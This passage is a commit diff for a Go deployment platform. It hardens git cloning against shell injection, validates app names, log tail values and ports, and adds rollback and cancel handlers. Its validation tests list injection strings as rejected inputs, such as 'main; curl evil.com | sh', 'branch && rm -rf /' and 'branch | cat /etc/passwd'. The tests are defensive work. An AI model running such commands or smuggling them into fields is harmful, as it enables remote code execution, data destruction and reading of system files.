test: add rollback error condition tests

Add tests for Rollback method error paths:
- No previous image available
- Empty previous image string
- App deployment lock held
- App lock already acquired

Relates to #71

internal/database/database.go

@@ -172,6 +172,7 @@ func (d *Database) connect(ctx context.Context) error {
 // HashWebhookSecret returns the hex-encoded SHA-256 hash of a webhook secret.
 func HashWebhookSecret(secret string) string {
 	sum := sha256.Sum256([]byte(secret))
+
 	return hex.EncodeToString(sum[:])
 }
 
@@ -181,6 +182,7 @@ func (d *Database) backfillWebhookSecretHashes(ctx context.Context) error {
 	if err != nil {
 		return fmt.Errorf("querying apps for backfill: %w", err)
 	}
+
 	defer func() { _ = rows.Close() }()
 
 	type row struct {
@@ -191,14 +193,17 @@ func (d *Database) backfillWebhookSecretHashes(ctx context.Context) error {
 
 	for rows.Next() {
 		var r row
-		if scanErr := rows.Scan(&r.id, &r.secret); scanErr != nil {
+
+		scanErr := rows.Scan(&r.id, &r.secret)
+		if scanErr != nil {
 			return fmt.Errorf("scanning app for backfill: %w", scanErr)
 		}
 
 		toUpdate = append(toUpdate, r)
 	}
 
-	if rowsErr := rows.Err(); rowsErr != nil {
+	rowsErr := rows.Err()
+	if rowsErr != nil {
 		return fmt.Errorf("iterating apps for backfill: %w", rowsErr)
 	}
 

internal/database/migrations/006_add_previous_image_id.sql

@@ -0,0 +1,2 @@
+-- Add previous_image_id to apps for deployment rollback support
+ALTER TABLE apps ADD COLUMN previous_image_id TEXT;

internal/docker/client.go

@@ -10,6 +10,7 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
+	"regexp"
 	"strconv"
 	"strings"
 
@@ -46,6 +47,18 @@ var ErrNotConnected = errors.New("docker client not connected")
 // ErrGitCloneFailed is returned when git clone fails.
 var ErrGitCloneFailed = errors.New("git clone failed")
 
+// ErrInvalidBranch is returned when a branch name contains invalid characters.
+var ErrInvalidBranch = errors.New("invalid branch name")
+
+// ErrInvalidCommitSHA is returned when a commit SHA is not a valid hex string.
+var ErrInvalidCommitSHA = errors.New("invalid commit SHA")
+
+// validBranchRe matches safe git branch names.
+var validBranchRe = regexp.MustCompile(`^[a-zA-Z0-9._/\-]+$`)
+
+// validCommitSHARe matches a full-length hex commit SHA.
+var validCommitSHARe = regexp.MustCompile(`^[0-9a-f]{40}$`)
+
 // Params contains dependencies for Client.
 type Params struct {
 	fx.In
@@ -430,6 +443,15 @@ func (c *Client) CloneRepo(
 	ctx context.Context,
 	repoURL, branch, commitSHA, sshPrivateKey, containerDir, hostDir string,
 ) (*CloneResult, error) {
+	// Validate inputs to prevent shell injection
+	if !validBranchRe.MatchString(branch) {
+		return nil, fmt.Errorf("%w: %q", ErrInvalidBranch, branch)
+	}
+
+	if commitSHA != "" && !validCommitSHARe.MatchString(commitSHA) {
+		return nil, fmt.Errorf("%w: %q", ErrInvalidCommitSHA, commitSHA)
+	}
+
 	if c.docker == nil {
 		return nil, ErrNotConnected
 	}
@@ -584,39 +606,39 @@ func (c *Client) createGitContainer(
 ) (string, error) {
 	gitSSHCmd := "ssh -i /keys/deploy_key -o StrictHostKeyChecking=no"
 
-	// Build the git command based on whether we have a specific commit SHA
-	var cmd []string
-
-	var entrypoint []string
-
+	// Build the git command using environment variables to avoid shell injection.
+	// Arguments are passed via env vars and quoted in the shell script.
+	var script string
 	if cfg.commitSHA != "" {
 		// Clone without depth limit so we can checkout any commit, then checkout specific SHA
-		// Using sh -c to run multiple commands - need to clear entrypoint
-		// Output "COMMIT:<sha>" marker at end for parsing
-		script := fmt.Sprintf(
-			"git clone --branch %s %s /repo && cd /repo && git checkout %s && echo COMMIT:$(git rev-parse HEAD)",
-			cfg.branch, cfg.repoURL, cfg.commitSHA,
-		)
-		entrypoint = []string{}
-		cmd = []string{"sh", "-c", script}
+		script = `git clone --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
+			` && cd /repo && git checkout "$CLONE_SHA"` +
+			` && echo COMMIT:$(git rev-parse HEAD)`
 	} else {
 		// Shallow clone of branch HEAD, then output commit SHA
-		// Using sh -c to run multiple commands
-		script := fmt.Sprintf(
-			"git clone --depth 1 --branch %s %s /repo && cd /repo && echo COMMIT:$(git rev-parse HEAD)",
-			cfg.branch, cfg.repoURL,
-		)
-		entrypoint = []string{}
-		cmd = []string{"sh", "-c", script}
+		script = `git clone --depth 1 --branch "$CLONE_BRANCH" "$CLONE_URL" /repo` +
+			` && cd /repo && echo COMMIT:$(git rev-parse HEAD)`
 	}
 
+	env := []string{
+		"GIT_SSH_COMMAND=" + gitSSHCmd,
+		"CLONE_URL=" + cfg.repoURL,
+		"CLONE_BRANCH=" + cfg.branch,
+	}
+	if cfg.commitSHA != "" {
+		env = append(env, "CLONE_SHA="+cfg.commitSHA)
+	}
+
+	entrypoint := []string{}
+	cmd := []string{"sh", "-c", script}
+
 	// Use host paths for Docker bind mounts (Docker runs on the host, not in our container)
 	resp, err := c.docker.ContainerCreate(ctx,
 		&container.Config{
 			Image:      gitImage,
 			Entrypoint: entrypoint,
 			Cmd:        cmd,
-			Env:        []string{"GIT_SSH_COMMAND=" + gitSSHCmd},
+			Env:        env,
 			WorkingDir: "/",
 		},
 		&container.HostConfig{

internal/docker/validation_test.go

@@ -0,0 +1,148 @@
+package docker //nolint:testpackage // tests unexported regexps and Client struct
+
+import (
+	"errors"
+	"log/slog"
+	"testing"
+)
+
+func TestValidBranchRegex(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"main",
+		"develop",
+		"feature/my-feature",
+		"release-1.0",
+		"v1.2.3",
+		"fix/issue_42",
+		"my.branch",
+	}
+	for _, b := range valid {
+		if !validBranchRe.MatchString(b) {
+			t.Errorf("expected branch %q to be valid", b)
+		}
+	}
+
+	invalid := []string{
+		"main; curl evil.com | sh",
+		"branch$(whoami)",
+		"branch`id`",
+		"branch && rm -rf /",
+		"branch | cat /etc/passwd",
+		"",
+		"branch name with spaces",
+		"branch\nnewline",
+	}
+	for _, b := range invalid {
+		if validBranchRe.MatchString(b) {
+			t.Errorf("expected branch %q to be invalid (potential injection)", b)
+		}
+	}
+}
+
+func TestValidCommitSHARegex(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"abc123def456789012345678901234567890abcd",
+		"0000000000000000000000000000000000000000",
+		"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+	}
+	for _, s := range valid {
+		if !validCommitSHARe.MatchString(s) {
+			t.Errorf("expected SHA %q to be valid", s)
+		}
+	}
+
+	invalid := []string{
+		"short",
+		"abc123",
+		"ABCDEF1234567890123456789012345678901234", // uppercase
+		"abc123def456789012345678901234567890abcd; rm -rf /",
+		"$(whoami)000000000000000000000000000000000",
+		"",
+	}
+	for _, s := range invalid {
+		if validCommitSHARe.MatchString(s) {
+			t.Errorf("expected SHA %q to be invalid (potential injection)", s)
+		}
+	}
+}
+
+func TestCloneRepoRejectsInjection(t *testing.T) { //nolint:funlen // table-driven test
+	t.Parallel()
+
+	c := &Client{
+		log: slog.Default(),
+	}
+
+	tests := []struct {
+		name      string
+		branch    string
+		commitSHA string
+		wantErr   error
+	}{
+		{
+			name:    "shell injection in branch",
+			branch:  "main; curl evil.com | sh #",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:    "command substitution in branch",
+			branch:  "$(whoami)",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:    "backtick injection in branch",
+			branch:  "`id`",
+			wantErr: ErrInvalidBranch,
+		},
+		{
+			name:      "injection in commitSHA",
+			branch:    "main",
+			commitSHA: "not-a-sha; rm -rf /",
+			wantErr:   ErrInvalidCommitSHA,
+		},
+		{
+			name:      "short SHA rejected",
+			branch:    "main",
+			commitSHA: "abc123",
+			wantErr:   ErrInvalidCommitSHA,
+		},
+		{
+			name:      "valid inputs pass validation (hit NotConnected)",
+			branch:    "main",
+			commitSHA: "abc123def456789012345678901234567890abcd",
+			wantErr:   ErrNotConnected,
+		},
+		{
+			name:    "valid branch no SHA passes validation (hit NotConnected)",
+			branch:  "main",
+			wantErr: ErrNotConnected,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			_, err := c.CloneRepo(
+				t.Context(),
+				"git@example.com:repo.git",
+				tt.branch,
+				tt.commitSHA,
+				"fake-key",
+				"/tmp/container",
+				"/tmp/host",
+			)
+			if err == nil {
+				t.Fatal("expected error, got nil")
+			}
+
+			if !errors.Is(err, tt.wantErr) {
+				t.Errorf("expected error %v, got %v", tt.wantErr, err)
+			}
+		})
+	}
+}

internal/handlers/app.go

@@ -32,16 +32,12 @@ func (h *Handlers) HandleAppNew() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_new.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "app_new.html", data)
 	}
 }
 
 // HandleAppCreate handles app creation.
-func (h *Handlers) HandleAppCreate() http.HandlerFunc {
+func (h *Handlers) HandleAppCreate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
 	tmpl := templates.GetParsed()
 
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -66,6 +62,14 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc {
 
 		if name == "" || repoURL == "" {
 			data["Error"] = "Name and repository URL are required"
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
+
+			return
+		}
+
+		nameErr := validateAppName(name)
+		if nameErr != nil {
+			data["Error"] = "Invalid app name: " + nameErr.Error()
 			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
 
 			return
@@ -91,7 +95,7 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc {
 		if createErr != nil {
 			h.log.Error("failed to create app", "error", createErr)
 			data["Error"] = "Failed to create app: " + createErr.Error()
-			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
+			h.renderTemplate(writer, tmpl, "app_new.html", data)
 
 			return
 		}
@@ -152,11 +156,7 @@ func (h *Handlers) HandleAppDetail() http.HandlerFunc {
 			"Success":          request.URL.Query().Get("success"),
 		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_detail.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "app_detail.html", data)
 	}
 }
 
@@ -185,16 +185,12 @@ func (h *Handlers) HandleAppEdit() http.HandlerFunc {
 			"App": application,
 		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "app_edit.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "app_edit.html", data)
 	}
 }
 
 // HandleAppUpdate handles app updates.
-func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
+func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
 	tmpl := templates.GetParsed()
 
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -214,7 +210,20 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 			return
 		}
 
-		application.Name = request.FormValue("name")
+		newName := request.FormValue("name")
+
+		nameErr := validateAppName(newName)
+		if nameErr != nil {
+			data := h.addGlobals(map[string]any{
+				"App":   application,
+				"Error": "Invalid app name: " + nameErr.Error(),
+			}, request)
+			_ = tmpl.ExecuteTemplate(writer, "app_edit.html", data)
+
+			return
+		}
+
+		application.Name = newName
 		application.RepoURL = request.FormValue("repo_url")
 		application.Branch = request.FormValue("branch")
 		application.DockerfilePath = request.FormValue("dockerfile_path")
@@ -245,7 +254,7 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 				"App":   application,
 				"Error": "Failed to update app",
 			}, request)
-			_ = tmpl.ExecuteTemplate(writer, "app_edit.html", data)
+			h.renderTemplate(writer, tmpl, "app_edit.html", data)
 
 			return
 		}
@@ -255,6 +264,33 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 	}
 }
 
+// cleanupContainer stops and removes the Docker container for the given app.
+func (h *Handlers) cleanupContainer(ctx context.Context, appID, appName string) {
+	containerInfo, containerErr := h.docker.FindContainerByAppID(ctx, appID)
+	if containerErr != nil || containerInfo == nil {
+		return
+	}
+
+	if containerInfo.Running {
+		stopErr := h.docker.StopContainer(ctx, containerInfo.ID)
+		if stopErr != nil {
+			h.log.Error("failed to stop container during app deletion",
+				"error", stopErr, "app", appName,
+				"container", containerInfo.ID)
+		}
+	}
+
+	removeErr := h.docker.RemoveContainer(ctx, containerInfo.ID, true)
+	if removeErr != nil {
+		h.log.Error("failed to remove container during app deletion",
+			"error", removeErr, "app", appName,
+			"container", containerInfo.ID)
+	} else {
+		h.log.Info("removed container during app deletion",
+			"app", appName, "container", containerInfo.ID)
+	}
+}
+
 // HandleAppDelete handles app deletion.
 func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -268,27 +304,7 @@ func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 		}
 
 		// Stop and remove the Docker container before deleting the DB record
-		containerInfo, containerErr := h.docker.FindContainerByAppID(request.Context(), appID)
-		if containerErr == nil && containerInfo != nil {
-			if containerInfo.Running {
-				stopErr := h.docker.StopContainer(request.Context(), containerInfo.ID)
-				if stopErr != nil {
-					h.log.Error("failed to stop container during app deletion",
-						"error", stopErr, "app", application.Name,
-						"container", containerInfo.ID)
-				}
-			}
-
-			removeErr := h.docker.RemoveContainer(request.Context(), containerInfo.ID, true)
-			if removeErr != nil {
-				h.log.Error("failed to remove container during app deletion",
-					"error", removeErr, "app", application.Name,
-					"container", containerInfo.ID)
-			} else {
-				h.log.Info("removed container during app deletion",
-					"app", application.Name, "container", containerInfo.ID)
-			}
-		}
+		h.cleanupContainer(request.Context(), appID, application.Name)
 
 		deleteErr := application.Delete(request.Context())
 		if deleteErr != nil {
@@ -319,7 +335,7 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 		deployCtx := context.WithoutCancel(request.Context())
 
 		go func(ctx context.Context, appToDeploy *models.App) {
-			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil)
+			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil, false)
 			if deployErr != nil {
 				h.log.Error(
 					"deployment failed",
@@ -338,6 +354,56 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 	}
 }
 
+// HandleCancelDeploy cancels an in-progress deployment for an app.
+func (h *Handlers) HandleCancelDeploy() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, findErr := models.FindApp(request.Context(), h.db, appID)
+		if findErr != nil || application == nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		cancelled := h.deploy.CancelDeploy(application.ID)
+		if cancelled {
+			h.log.Info("deployment cancelled by user", "app", application.Name)
+		}
+
+		http.Redirect(
+			writer,
+			request,
+			"/apps/"+application.ID,
+			http.StatusSeeOther,
+		)
+	}
+}
+
+// HandleAppRollback handles rolling back to the previous deployment image.
+func (h *Handlers) HandleAppRollback() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+
+		application, findErr := models.FindApp(request.Context(), h.db, appID)
+		if findErr != nil || application == nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		rollbackErr := h.deploy.Rollback(request.Context(), application)
+		if rollbackErr != nil {
+			h.log.Error("rollback failed", "error", rollbackErr, "app", application.Name)
+			http.Redirect(writer, request, "/apps/"+application.ID, http.StatusSeeOther)
+
+			return
+		}
+
+		http.Redirect(writer, request, "/apps/"+application.ID+"?success=rolledback", http.StatusSeeOther)
+	}
+}
+
 // HandleAppDeployments returns the deployments history handler.
 func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 	tmpl := templates.GetParsed()
@@ -362,16 +428,34 @@ func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 			"Deployments": deployments,
 		}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "deployments.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "deployments.html", data)
 	}
 }
 
-// defaultLogTail is the default number of log lines to fetch.
-const defaultLogTail = "500"
+// DefaultLogTail is the default number of log lines to fetch.
+const DefaultLogTail = "500"
+
+// maxLogTail is the maximum allowed value for the tail parameter.
+const maxLogTail = 500
+
+// SanitizeTail validates and clamps the tail query parameter.
+// It returns a numeric string clamped to maxLogTail, or the default if invalid.
+func SanitizeTail(raw string) string {
+	if raw == "" {
+		return DefaultLogTail
+	}
+
+	n, err := strconv.Atoi(raw)
+	if err != nil || n < 1 {
+		return DefaultLogTail
+	}
+
+	if n > maxLogTail {
+		n = maxLogTail
+	}
+
+	return strconv.Itoa(n)
+}
 
 // HandleAppLogs returns the container logs handler.
 func (h *Handlers) HandleAppLogs() http.HandlerFunc {
@@ -394,10 +478,7 @@ func (h *Handlers) HandleAppLogs() http.HandlerFunc {
 			return
 		}
 
-		tail := request.URL.Query().Get("tail")
-		if tail == "" {
-			tail = defaultLogTail
-		}
+		tail := SanitizeTail(request.URL.Query().Get("tail"))
 
 		logs, logsErr := h.docker.ContainerLogs(
 			request.Context(),
@@ -1018,7 +1099,12 @@ func parsePortValues(hostPortStr, containerPortStr string) (int, int, bool) {
 	hostPort, hostErr := strconv.Atoi(hostPortStr)
 	containerPort, containerErr := strconv.Atoi(containerPortStr)
 
-	if hostErr != nil || containerErr != nil || hostPort <= 0 || containerPort <= 0 {
+	const maxPort = 65535
+
+	invalid := hostErr != nil || containerErr != nil ||
+		hostPort <= 0 || containerPort <= 0 ||
+		hostPort > maxPort || containerPort > maxPort
+	if invalid {
 		return 0, 0, false
 	}
 

internal/handlers/app_name_validation.go

@@ -0,0 +1,44 @@
+package handlers
+
+import (
+	"errors"
+	"regexp"
+	"strconv"
+)
+
+const (
+	// appNameMinLength is the minimum allowed length for an app name.
+	appNameMinLength = 2
+	// appNameMaxLength is the maximum allowed length for an app name.
+	appNameMaxLength = 63
+)
+
+// validAppNameRe matches names containing only lowercase alphanumeric characters and
+// hyphens, starting and ending with an alphanumeric character.
+var validAppNameRe = regexp.MustCompile(`^[a-z0-9][a-z0-9-]*[a-z0-9]$`)
+
+// validateAppName checks that the given app name is safe for use in Docker
+// container names, image tags, and file system paths.
+var (
+	errAppNameLength = errors.New(
+		"app name must be between " +
+			strconv.Itoa(appNameMinLength) + " and " +
+			strconv.Itoa(appNameMaxLength) + " characters",
+	)
+	errAppNamePattern = errors.New(
+		"app name must contain only lowercase letters, numbers, " +
+			"and hyphens, and must start and end with a letter or number",
+	)
+)
+
+func validateAppName(name string) error {
+	if len(name) < appNameMinLength || len(name) > appNameMaxLength {
+		return errAppNameLength
+	}
+
+	if !validAppNameRe.MatchString(name) {
+		return errAppNamePattern
+	}
+
+	return nil
+}

internal/handlers/app_name_validation_test.go

@@ -0,0 +1,48 @@
+package handlers //nolint:testpackage // testing unexported validateAppName
+
+import (
+	"testing"
+)
+
+func TestValidateAppName(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name    string
+		input   string
+		wantErr bool
+	}{
+		{"valid simple", "myapp", false},
+		{"valid with hyphen", "my-app", false},
+		{"valid with numbers", "app123", false},
+		{"valid two chars", "ab", false},
+		{"valid complex", "my-cool-app-v2", false},
+		{"valid all numbers", "123", false},
+		{"empty", "", true},
+		{"single char", "a", true},
+		{"too long", "a" + string(make([]byte, 63)), true},
+		{"exactly 63 chars", "a23456789012345678901234567890123456789012345678901234567890123", false},
+		{"64 chars", "a234567890123456789012345678901234567890123456789012345678901234", true},
+		{"uppercase", "MyApp", true},
+		{"spaces", "my app", true},
+		{"starts with hyphen", "-myapp", true},
+		{"ends with hyphen", "myapp-", true},
+		{"underscore", "my_app", true},
+		{"dot", "my.app", true},
+		{"slash", "my/app", true},
+		{"path traversal", "../etc/passwd", true},
+		{"special chars", "app@name!", true},
+		{"unicode", "appñame", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			err := validateAppName(tt.input)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("validateAppName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
+			}
+		})
+	}
+}

internal/handlers/auth.go

@@ -13,11 +13,7 @@ func (h *Handlers) HandleLoginGET() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "login.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "login.html", data)
 	}
 }
 
@@ -42,7 +38,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 
 		if username == "" || password == "" {
 			data["Error"] = "Username and password are required"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}
@@ -50,7 +46,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 		user, authErr := h.auth.Authenticate(request.Context(), username, password)
 		if authErr != nil {
 			data["Error"] = "Invalid username or password"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}
@@ -60,7 +56,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 			h.log.Error("failed to create session", "error", sessionErr)
 
 			data["Error"] = "Failed to create session"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}

internal/handlers/dashboard.go

@@ -69,10 +69,6 @@ func (h *Handlers) HandleDashboard() http.HandlerFunc {
 			"AppStats": appStats,
 		}, request)
 
-		execErr := tmpl.ExecuteTemplate(writer, "dashboard.html", data)
-		if execErr != nil {
-			h.log.Error("template execution failed", "error", execErr)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "dashboard.html", data)
 	}
 }

internal/handlers/handlers.go

@@ -2,8 +2,8 @@
 package handlers
 
 import (
+	"bytes"
 	"encoding/json"
-	"html/template"
 	"log/slog"
 	"net/http"
 
@@ -19,6 +19,7 @@ import (
 	"git.eeqj.de/sneak/upaas/internal/service/auth"
 	"git.eeqj.de/sneak/upaas/internal/service/deploy"
 	"git.eeqj.de/sneak/upaas/internal/service/webhook"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 
 // Params contains dependencies for Handlers.
@@ -75,12 +76,34 @@ func (h *Handlers) addGlobals(
 	data["Appname"] = h.globals.Appname
 
 	if request != nil {
-		data["CSRFField"] = template.HTML(csrf.TemplateField(request)) //nolint:gosec // csrf.TemplateField produces safe HTML
+		data["CSRFField"] = csrf.TemplateField(request)
 	}
 
 	return data
 }
 
+// renderTemplate executes the named template into a buffer first, then writes
+// to the ResponseWriter only on success. This prevents partial/corrupt HTML
+// responses when template execution fails partway through.
+func (h *Handlers) renderTemplate(
+	writer http.ResponseWriter,
+	tmpl *templates.TemplateExecutor,
+	name string,
+	data any,
+) {
+	var buf bytes.Buffer
+
+	err := tmpl.ExecuteTemplate(&buf, name, data)
+	if err != nil {
+		h.log.Error("template execution failed", "error", err)
+		http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
+
+		return
+	}
+
+	_, _ = buf.WriteTo(writer)
+}
+
 func (h *Handlers) respondJSON(
 	writer http.ResponseWriter,
 	_ *http.Request,

internal/handlers/handlers_test.go

@@ -450,8 +450,8 @@ func createTestApp(
 	return createdApp
 }
 
-// TestDeleteEnvVarOwnershipVerification tests that deleting an env var
-// via another app's URL path returns 404 (IDOR prevention).
+// TestHandleWebhookRejectsOversizedBody tests that oversized webhook payloads
+// are handled gracefully.
 func TestHandleWebhookRejectsOversizedBody(t *testing.T) {
 	t.Parallel()
 
@@ -493,85 +493,113 @@ func TestHandleWebhookRejectsOversizedBody(t *testing.T) {
 	assert.Equal(t, http.StatusOK, recorder.Code)
 }
 
-// TestDeleteEnvVarOwnershipVerification tests that deleting an env var
-// via another app's URL path returns 404 (IDOR prevention).
-func TestDeleteEnvVarOwnershipVerification(t *testing.T) {
-	t.Parallel()
+// ownedResourceTestConfig configures an IDOR ownership verification test.
+type ownedResourceTestConfig struct {
+	appPrefix1 string
+	appPrefix2 string
+	createFn   func(t *testing.T, tc *testContext, app *models.App) int64
+	deletePath func(appID string, resourceID int64) string
+	chiParams  func(appID string, resourceID int64) map[string]string
+	handler    func(h *handlers.Handlers) http.HandlerFunc
+	verifyFn   func(t *testing.T, tc *testContext, resourceID int64)
+}
+
+func testOwnershipVerification(t *testing.T, cfg ownedResourceTestConfig) {
+	t.Helper()
 
 	testCtx := setupTestHandlers(t)
 
-	app1 := createTestApp(t, testCtx, "envvar-owner-app")
-	app2 := createTestApp(t, testCtx, "envvar-other-app")
+	app1 := createTestApp(t, testCtx, cfg.appPrefix1)
+	app2 := createTestApp(t, testCtx, cfg.appPrefix2)
 
-	// Create env var belonging to app1
-	envVar := models.NewEnvVar(testCtx.database)
-	envVar.AppID = app1.ID
-	envVar.Key = "SECRET"
-	envVar.Value = "hunter2"
-	require.NoError(t, envVar.Save(context.Background()))
+	resourceID := cfg.createFn(t, testCtx, app1)
 
-	// Try to delete app1's env var using app2's URL path
 	request := httptest.NewRequest(
 		http.MethodPost,
-		"/apps/"+app2.ID+"/env/"+strconv.FormatInt(envVar.ID, 10)+"/delete",
+		cfg.deletePath(app2.ID, resourceID),
 		nil,
 	)
-	request = addChiURLParams(request, map[string]string{
-		"id":    app2.ID,
-		"envID": strconv.FormatInt(envVar.ID, 10),
-	})
+	request = addChiURLParams(request, cfg.chiParams(app2.ID, resourceID))
+
 	recorder := httptest.NewRecorder()
 
-	handler := testCtx.handlers.HandleEnvVarDelete()
+	handler := cfg.handler(testCtx.handlers)
 	handler.ServeHTTP(recorder, request)
 
-	// Should return 404 because the env var doesn't belong to app2
 	assert.Equal(t, http.StatusNotFound, recorder.Code)
+	cfg.verifyFn(t, testCtx, resourceID)
+}
 
-	// Verify the env var was NOT deleted
-	found, err := models.FindEnvVar(context.Background(), testCtx.database, envVar.ID)
-	require.NoError(t, err)
-	assert.NotNil(t, found, "env var should still exist after IDOR attempt")
+// TestDeleteEnvVarOwnershipVerification tests that deleting an env var
+// via another app's URL path returns 404 (IDOR prevention).
+func TestDeleteEnvVarOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
+	t.Parallel()
+
+	testOwnershipVerification(t, ownedResourceTestConfig{
+		appPrefix1: "envvar-owner-app",
+		appPrefix2: "envvar-other-app",
+		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
+			t.Helper()
+
+			envVar := models.NewEnvVar(tc.database)
+			envVar.AppID = ownerApp.ID
+			envVar.Key = "SECRET"
+			envVar.Value = "hunter2"
+			require.NoError(t, envVar.Save(context.Background()))
+
+			return envVar.ID
+		},
+		deletePath: func(appID string, resourceID int64) string {
+			return "/apps/" + appID + "/env/" + strconv.FormatInt(resourceID, 10) + "/delete"
+		},
+		chiParams: func(appID string, resourceID int64) map[string]string {
+			return map[string]string{"id": appID, "envID": strconv.FormatInt(resourceID, 10)}
+		},
+		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleEnvVarDelete() },
+		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
+			t.Helper()
+
+			found, findErr := models.FindEnvVar(context.Background(), tc.database, resourceID)
+			require.NoError(t, findErr)
+			assert.NotNil(t, found, "env var should still exist after IDOR attempt")
+		},
+	})
 }
 
 // TestDeleteLabelOwnershipVerification tests that deleting a label
 // via another app's URL path returns 404 (IDOR prevention).
-func TestDeleteLabelOwnershipVerification(t *testing.T) {
+func TestDeleteLabelOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
 	t.Parallel()
 
-	testCtx := setupTestHandlers(t)
+	testOwnershipVerification(t, ownedResourceTestConfig{
+		appPrefix1: "label-owner-app",
+		appPrefix2: "label-other-app",
+		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
+			t.Helper()
 
-	app1 := createTestApp(t, testCtx, "label-owner-app")
-	app2 := createTestApp(t, testCtx, "label-other-app")
+			lbl := models.NewLabel(tc.database)
+			lbl.AppID = ownerApp.ID
+			lbl.Key = "traefik.enable"
+			lbl.Value = "true"
+			require.NoError(t, lbl.Save(context.Background()))
 
-	// Create label belonging to app1
-	label := models.NewLabel(testCtx.database)
-	label.AppID = app1.ID
-	label.Key = "traefik.enable"
-	label.Value = "true"
-	require.NoError(t, label.Save(context.Background()))
+			return lbl.ID
+		},
+		deletePath: func(appID string, resourceID int64) string {
+			return "/apps/" + appID + "/labels/" + strconv.FormatInt(resourceID, 10) + "/delete"
+		},
+		chiParams: func(appID string, resourceID int64) map[string]string {
+			return map[string]string{"id": appID, "labelID": strconv.FormatInt(resourceID, 10)}
+		},
+		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleLabelDelete() },
+		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
+			t.Helper()
 
-	// Try to delete app1's label using app2's URL path
-	request := httptest.NewRequest(
-		http.MethodPost,
-		"/apps/"+app2.ID+"/labels/"+strconv.FormatInt(label.ID, 10)+"/delete",
-		nil,
-	)
